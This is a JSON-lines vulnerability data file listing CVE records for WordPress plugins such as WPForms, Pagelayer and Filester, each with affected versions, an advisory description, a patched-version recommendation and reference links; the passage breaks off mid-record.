{"CVE_ID":"CVE-2024-3649","slug":"wpforms-lite","versionImpact":"1.8.7.2","versionEndExcluding":"1.8.8.2","description":"The Contact Form by WPForms \u2013 Drag & Drop Form Builder for WordPress plugin for WordPress is vulnerable to price manipulation in versions up to, and including, 1.8.7.2. This is due to a lack of controls on several product parameters. This makes it possible for unauthenticated attackers to manipulate prices, product information, and quantities for purchases made via the Stripe payment integration.","recommendation":"Update to version 1.8.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68a509ae-9943-4b9a-8ede-2b5732e96e6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68a509ae-9943-4b9a-8ede-2b5732e96e6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075634\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075634\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075634\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/integrations\\\/stripe\\\/wpforms-stripe-payment-element.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075634\\\/wpforms-lite\\\/trunk\\\/assets\\\/js\\\/integrations\\\/stripe\\\/wpforms-stripe-payment-element.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8426","slug":"pagelayer","versionImpact":"1.8.7","versionEndExcluding":"1.8.8","description":"The Page Builder: Pagelayer WordPress plugin before 1.8.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 1.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f81b7478-c775-45ff-bbb8-d13c3f58acc6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f81b7478-c775-45ff-bbb8-d13c3f58acc6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7501","slug":"download-plugins-dashboard","versionImpact":"1.8.7","versionEndExcluding":"1.8.8","description":"The Download Plugins and Themes in ZIP from Dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.7. This is due to missing or incorrect nonce validation on the download_theme() function. This makes it possible for unauthenticated attackers to download arbitrary themes from the website via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. In versions prior to 1.8.6 it was possible to download the entire site's files.","recommendation":"Update to version 1.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcbfcaeb-2635-4b11-b426-ee04345d5f36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcbfcaeb-2635-4b11-b426-ee04345d5f36?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136231\\\/download-plugins-dashboard\\\/tags\\\/1.8.8\\\/includes\\\/class-alg-download-plugins-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136231\\\/download-plugins-dashboard\\\/tags\\\/1.8.8\\\/includes\\\/class-alg-download-plugins-core.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13699","slug":"qi-addons-for-elementor","versionImpact":"1.8.7","versionEndExcluding":"1.8.8","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018cursor\u2019 parameter in all versions up to, and including, 1.8.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in versions 1.8.5, 1.8.6, and 1.8.7.","recommendation":"Update to version 1.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/trunk\\\/inc\\\/shortcodes\\\/typeout-text\\\/class-qiaddonsforelementor-typeout-text-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/trunk\\\/inc\\\/shortcodes\\\/typeout-text\\\/class-qiaddonsforelementor-typeout-text-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230342\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230342\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231980\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231980\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3232550\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3232550\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234136\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234136\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/add39d28-4070-44e2-8dff-0371e0c58453?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/add39d28-4070-44e2-8dff-0371e0c58453?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6742","slug":"envira-gallery-lite","versionImpact":"1.8.7.2","versionEndExcluding":"1.8.7.3","description":"The Gallery Plugin for WordPress \u2013 Envira Photo Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to an improper capability check on the 'envira_gallery_insert_images' function in all versions up to, and including, 1.8.7.1. This makes it possible for authenticated attackers, with contributor access and above, to modify galleries on other users' posts.","recommendation":"Update to version 1.8.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40655278-6915-4a76-ac2d-bb161d3cee92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40655278-6915-4a76-ac2d-bb161d3cee92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envira-gallery-lite\\\/trunk\\\/includes\\\/admin\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envira-gallery-lite\\\/trunk\\\/includes\\\/admin\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3017115\\\/envira-gallery-lite\\\/tags\\\/1.8.7.3\\\/includes\\\/admin\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3017115\\\/envira-gallery-lite\\\/tags\\\/1.8.7.3\\\/includes\\\/admin\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12331","slug":"filester","versionImpact":"1.8.6","versionEndExcluding":"1.8.7","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_install_plugin' function in all versions up to, and including, 1.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install the Filebird plugin.","recommendation":"Update to version 1.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208858\\\/filester\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208858\\\/filester\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b09bfff-4d6e-4de0-b6ab-6ac27c4f2be6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b09bfff-4d6e-4de0-b6ab-6ac27c4f2be6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3435","slug":"mangboard","versionImpact":"1.8.6","versionEndExcluding":"1.8.7","description":"The Mang Board WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the board_header and board_footer parameters in all versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3272163\\\/mangboard\\\/trunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3272163\\\/mangboard\\\/trunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b97a2f7-b730-4fb7-a41e-dd37f5f87f27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b97a2f7-b730-4fb7-a41e-dd37f5f87f27?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5275","slug":"charitable","versionImpact":"1.8.6.1","versionEndExcluding":"1.8.6.2","description":"The Charitable \u2013 Donation Plugin for WordPress \u2013 Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the privacy settings fields in all versions up to, and including, 1.8.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.\r\nThis issue was partially fixed in version 1.8.6.1 and fully fixed in version 1.8.6.2.","recommendation":"Update to version 1.8.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.5.3\\\/templates\\\/form-fields\\\/checkbox.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.5.3\\\/templates\\\/form-fields\\\/checkbox.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/453d8918-32dc-43d6-8969-71f719536891?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/453d8918-32dc-43d6-8969-71f719536891?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13568","slug":"fluent-support","versionImpact":"1.8.5","versionEndExcluding":"1.8.6","description":"The Fluent Support \u2013 Helpdesk & Customer Support Ticket System plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.5 via the 'fluent-support' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/fluent-support directory which can contain file attachments included in support tickets.","recommendation":"Update to version 1.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluent-support\\\/trunk\\\/app\\\/Services\\\/Includes\\\/FileSystem.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluent-support\\\/trunk\\\/app\\\/Services\\\/Includes\\\/FileSystem.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f40832-8ae5-443a-aa98-f0e61d1152cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f40832-8ae5-443a-aa98-f0e61d1152cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4626","slug":"password-protect-page","versionEndExcluding":"1.8.6","description":"The PPWP WordPress plugin before 1.8.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59c577e9-7d1c-46bc-9218-3e143068738d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59c577e9-7d1c-46bc-9218-3e143068738d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9669","slug":"filester","versionImpact":"1.8.5","versionEndExcluding":"1.8.6","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to Local JavaScript File Inclusion in all versions up to, and including, 1.8.5 via the 'fm_locale' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The vulnerability was partially patched in version 1.8.5.","recommendation":"Update to version 1.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/views\\\/pages\\\/html-filemanager.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/views\\\/pages\\\/html-filemanager.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186518\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186518\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196150\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196150\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d947023-60d3-4bd8-b45d-e1663326d6c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d947023-60d3-4bd8-b45d-e1663326d6c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24916","slug":"UNKNOWN-CVE-2021-24916-1","versionEndExcluding":"1.8.6","description":"The Qubely WordPress plugin before 1.8.6 allows unauthenticated user to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.","recommendation":"Update to version 1.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93b893be-59ad-4500-8edb-9fa7a45304d5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93b893be-59ad-4500-8edb-9fa7a45304d5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6496","slug":"manage-notification-emails","versionImpact":"1.8.5","versionEndExcluding":"1.8.6","description":"The Manage Notification E-mails plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.8.5 via the card_famne_export_settings function. This makes it possible for unauthenticated attackers to obtain plugin settings.","recommendation":"Update to version 1.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048bc117-88df-44b3-a30c-692bad23050f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048bc117-88df-44b3-a30c-692bad23050f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3007199%40manage-notification-emails%2Ftrunk&old=2920034%40manage-notification-emails%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3007199%40manage-notification-emails%2Ftrunk&old=2920034%40manage-notification-emails%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7030","slug":"jquery-collapse-o-matic","versionImpact":"1.8.5.5","versionEndExcluding":"1.8.5.6","description":"The Collapse-O-Matic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'expand' shortcode in all versions up to, and including, 1.8.5.5 due to insufficient input sanitization and output escaping on the 'tag' user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea23bcc2-ce71-4f16-85f3-11276deb659f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea23bcc2-ce71-4f16-85f3-11276deb659f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074011%40jquery-collapse-o-matic&new=3074011%40jquery-collapse-o-matic&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3074011%40jquery-collapse-o-matic&new=3074011%40jquery-collapse-o-matic&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7063","slug":"wpforms","versionImpact":"1.8.5.3","versionEndExcluding":"1.8.5.4","description":"The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31c080b8-ba00-4e96-8961-2a1c3a017004?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31c080b8-ba00-4e96-8961-2a1c3a017004?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpforms.com\\\/docs\\\/how-to-view-recent-changes-to-the-wpforms-plugin-changelog\\\/#1-8-5-4-2023-12-27\",\"name\":\"https:\\\/\\\/wpforms.com\\\/docs\\\/how-to-view-recent-changes-to-the-wpforms-plugin-changelog\\\/#1-8-5-4-2023-12-27\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5335","slug":"buzzsprout-podcasting","versionImpact":"1.8.4","versionEndExcluding":"1.8.5","description":"The Buzzsprout Podcasting plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'buzzsprout' shortcode in versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buzzsprout-podcasting\\\/tags\\\/1.8.3\\\/buzzsprout-podcasting.php#L271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buzzsprout-podcasting\\\/tags\\\/1.8.3\\\/buzzsprout-podcasting.php#L271\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be7f8b73-801d-46e8-81c1-8bb0bb576700?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be7f8b73-801d-46e8-81c1-8bb0bb576700?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23716","slug":"zendesk","versionImpact":"1.8.4","versionEndExcluding":"1.8.5","description":"Missing Authorization vulnerability in Zendesk Zendesk Support for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zendesk Support for WordPress: from n\/a through 1.8.4.","recommendation":"Update to version 1.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zendesk\\\/vulnerability\\\/wordpress-zendesk-support-for-wordpress-plugin-1-8-4-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zendesk\\\/vulnerability\\\/wordpress-zendesk-support-for-wordpress-plugin-1-8-4-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0376","slug":"qubely","versionImpact":"1.8.4","versionEndExcluding":"1.8.5","description":"The Qubely WordPress plugin before 1.8.5 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1aa6f32-c1d5-4fc6-9a4e-d4c5fae78389\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1aa6f32-c1d5-4fc6-9a4e-d4c5fae78389\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8066","slug":"filester","versionImpact":"1.8.4","versionEndExcluding":"1.8.5","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to arbitrary file uploads due to missing validation in the 'fsConnector' function in all versions up to, and including, 1.8.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to upload a new .htaccess file allowing them to subsequently upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186518\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186518\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27288836-e5d3-49fc-b1f6-319ea3b70839?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27288836-e5d3-49fc-b1f6-319ea3b70839?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8342","slug":"login-with-phone-number","versionImpact":"1.8.47","versionEndExcluding":"1.8.48","description":"The WooCommerce OTP Login With Phone Number, OTP Verification plugin for WordPress is vulnerable to authentication bypass due to insufficient empty value checking in the lwp_ajax_register function in all versions up to, and including, 1.8.47. This makes it possible for unauthenticated attackers to bypass OTP verification and gain administrative access to any user account with a configured phone number by exploiting improper Firebase API error handling when the Firebase API key is not configured.","recommendation":"Update to version 1.8.48, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.8.47\\\/login-with-phonenumber.php#L4358\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.8.47\\\/login-with-phonenumber.php#L4358\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.8.47\\\/login-with-phonenumber.php#L4373\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.8.47\\\/login-with-phonenumber.php#L4373\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338150%40login-with-phone-number&new=3338150%40login-with-phone-number&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338150%40login-with-phone-number&new=3338150%40login-with-phone-number&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e74582f-8e94-4cba-a3eb-0a823a5235ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e74582f-8e94-4cba-a3eb-0a823a5235ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38690","slug":"ipanorama-360-virtual-tour-builder-lite","versionImpact":"1.8.3","versionEndExcluding":"1.8.4","description":"Missing Authorization vulnerability in Avirtum iPanorama 360 WordPress Virtual Tour Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects iPanorama 360 WordPress Virtual Tour Builder: from n\/a through 1.8.3.","recommendation":"Update to version 1.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipanorama-360-virtual-tour-builder-lite\\\/wordpress-ipanorama-360-plugin-1-8-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipanorama-360-virtual-tour-builder-lite\\\/wordpress-ipanorama-360-plugin-1-8-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2127","slug":"pagelayer","versionImpact":"1.8.3","versionEndExcluding":"1.8.4","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom attributes in all versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98bff131-dee2-4549-9167-69dc3f8d6b9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98bff131-dee2-4549-9167-69dc3f8d6b9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045444%40pagelayer&new=3045444%40pagelayer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045444%40pagelayer&new=3045444%40pagelayer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4419","slug":"fetch-jft","versionImpact":"1.8.3","versionEndExcluding":"1.8.4","description":"The Fetch JFT plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.8.4, or a newer patched 